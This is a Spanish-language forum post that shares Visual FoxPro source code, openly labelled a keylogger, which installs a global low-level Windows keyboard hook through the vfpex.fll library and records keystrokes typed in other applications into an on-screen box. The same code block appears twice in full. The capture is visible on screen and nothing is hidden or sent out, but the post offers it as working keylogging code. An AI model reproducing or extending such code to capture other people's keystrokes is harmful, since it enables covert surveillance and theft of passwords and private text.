KEYLOGGER EN VFP HOOK WINDOWS
Publicado por Fernando Mora (42 intervenciones) el 14/07/2016 10:00:19
Saludos Foxeros
Aquí el codigo fuento de un keylogger, usa una FLL (vfpex.fll) que la pueden descargar de la siguiente dirección: http://www.sweetpotatosoftware.com/spsblog/ct.ashx?id=f7644db8-b155-4d43-8216-4cfde233edb7&url=http%3a%2f%2fwww.sweetpotatosoftware.com%2ffiles%2fvfpex.zip
***************************************************
*!* GLOBAL KEYBOARD HOOK EXAMPLE
*!*
*!* Requires: vfpex.fll
***************************************************
PUBLIC oform1
oform1=NEWOBJECT("form1")
oform1.Show
RETURN
DEFINE CLASS form1 AS form
Top = 0
Left = 1
Height = 256
Width = 454
DoCreate = .T.
Caption = "Using the New BindEventsEx - Global Keyboard Hook"
Name = "form1"
ADD OBJECT command1 AS commandbutton WITH ;
Top = 216, ;
Left = 311, ;
Height = 27, ;
Width = 132, ;
Caption = "R\<un Example", ;
Name = "Command1"
ADD OBJECT edit1 AS editbox WITH ;
Height = 193, ;
Left = 11, ;
ReadOnly = .T., ;
Top = 12, ;
Width = 432, ;
Name = "Edit1"
PROCEDURE wineventhandler
LOCAL HookStruct
*!* Real basic example, just to show it's possible
IF wParam = 256 && keydown
HookStruct = REPLICATE(CHR(0), 20)
CopyMemory(@Hookstruct, lParam, 20)
thisform.edit1.value = thisform.edit1.value + Chr(thisform.buf2dword(Hookstruct))
ENDIF
CallNextHookEx(hHook, nCode, wParam, lParam) && all 4 variables created by FLL
RELEASE nCode, wParam, LPARAM, hHook
ENDPROC
PROCEDURE buf2dword
LPARAMETERS tcBuffer
RETURN Asc(SUBSTR(tcBuffer, 1,1)) + ;
Asc(SUBSTR(tcBuffer, 2,1)) * 2^8 +;
Asc(SUBSTR(tcBuffer, 3,1)) * 2^16 +;
Asc(SUBSTR(tcBuffer, 4,1)) * 2^24
ENDPROC
PROCEDURE Load
DECLARE LONG CallNextHookEx IN user32;
LONG, LONG, LONG, LONG
DECLARE RtlMoveMemory IN kernel32 As CopyMemory;
STRING @ Destination,;
INTEGER Source,;
INTEGER nLength
SET LIBRARY TO (LOCFILE("vfpex.fll", "FLL"))
ENDPROC
PROCEDURE Destroy
*!* Unhook when form is destroyed
UnBindEventEx()
SET LIBRARY TO
ENDPROC
PROCEDURE command1.Click
#define WH_MSGFILTER -1
#define WH_JOURNALRECORD 0
#define WH_JOURNALPLAYBACK 1
#define WH_KEYBOARD 2
#define WH_GETMESSAGE 3
#define WH_CALLWNDPROC 4
#define WH_CBT 5
#define WH_SYSMSGFILTER 6
#define WH_MOUSE 7
#define WH_HARDWARE 8
#define WH_DEBUG 9
#define WH_SHELL 10
#define WH_FOREGROUNDIDLE 11
#define WH_CALLWNDPROCRET 12
#define WH_KEYBOARD_LL 13 && this is the one used
#define WH_MOUSE_LL 14
this.Enabled = .F.
WAIT "Go type in another application - your keystrokes will be recorded" WINDOW TIMEOUT 2
*!* You must have a Named reference to the form or object
*!* as thisform or this cannot be used with BindEventEx
BINDEVENTEX('oform1.wineventhandler()', WH_KEYBOARD_LL) && SetWindowsHookEx
ENDPROC
ENDDEFINE
Aquí el codigo fuento de un keylogger, usa una FLL (vfpex.fll) que la pueden descargar de la siguiente dirección: http://www.sweetpotatosoftware.com/spsblog/ct.ashx?id=f7644db8-b155-4d43-8216-4cfde233edb7&url=http%3a%2f%2fwww.sweetpotatosoftware.com%2ffiles%2fvfpex.zip
***************************************************
*!* GLOBAL KEYBOARD HOOK EXAMPLE
*!*
*!* Requires: vfpex.fll
***************************************************
PUBLIC oform1
oform1=NEWOBJECT("form1")
oform1.Show
RETURN
DEFINE CLASS form1 AS form
Top = 0
Left = 1
Height = 256
Width = 454
DoCreate = .T.
Caption = "Using the New BindEventsEx - Global Keyboard Hook"
Name = "form1"
ADD OBJECT command1 AS commandbutton WITH ;
Top = 216, ;
Left = 311, ;
Height = 27, ;
Width = 132, ;
Caption = "R\<un Example", ;
Name = "Command1"
ADD OBJECT edit1 AS editbox WITH ;
Height = 193, ;
Left = 11, ;
ReadOnly = .T., ;
Top = 12, ;
Width = 432, ;
Name = "Edit1"
PROCEDURE wineventhandler
LOCAL HookStruct
*!* Real basic example, just to show it's possible
IF wParam = 256 && keydown
HookStruct = REPLICATE(CHR(0), 20)
CopyMemory(@Hookstruct, lParam, 20)
thisform.edit1.value = thisform.edit1.value + Chr(thisform.buf2dword(Hookstruct))
ENDIF
CallNextHookEx(hHook, nCode, wParam, lParam) && all 4 variables created by FLL
RELEASE nCode, wParam, LPARAM, hHook
ENDPROC
PROCEDURE buf2dword
LPARAMETERS tcBuffer
RETURN Asc(SUBSTR(tcBuffer, 1,1)) + ;
Asc(SUBSTR(tcBuffer, 2,1)) * 2^8 +;
Asc(SUBSTR(tcBuffer, 3,1)) * 2^16 +;
Asc(SUBSTR(tcBuffer, 4,1)) * 2^24
ENDPROC
PROCEDURE Load
DECLARE LONG CallNextHookEx IN user32;
LONG, LONG, LONG, LONG
DECLARE RtlMoveMemory IN kernel32 As CopyMemory;
STRING @ Destination,;
INTEGER Source,;
INTEGER nLength
SET LIBRARY TO (LOCFILE("vfpex.fll", "FLL"))
ENDPROC
PROCEDURE Destroy
*!* Unhook when form is destroyed
UnBindEventEx()
SET LIBRARY TO
ENDPROC
PROCEDURE command1.Click
#define WH_MSGFILTER -1
#define WH_JOURNALRECORD 0
#define WH_JOURNALPLAYBACK 1
#define WH_KEYBOARD 2
#define WH_GETMESSAGE 3
#define WH_CALLWNDPROC 4
#define WH_CBT 5
#define WH_SYSMSGFILTER 6
#define WH_MOUSE 7
#define WH_HARDWARE 8
#define WH_DEBUG 9
#define WH_SHELL 10
#define WH_FOREGROUNDIDLE 11
#define WH_CALLWNDPROCRET 12
#define WH_KEYBOARD_LL 13 && this is the one used
#define WH_MOUSE_LL 14
this.Enabled = .F.
WAIT "Go type in another application - your keystrokes will be recorded" WINDOW TIMEOUT 2
*!* You must have a Named reference to the form or object
*!* as thisform or this cannot be used with BindEventEx
BINDEVENTEX('oform1.wineventhandler()', WH_KEYBOARD_LL) && SetWindowsHookEx
ENDPROC
ENDDEFINE
Valora esta pregunta
0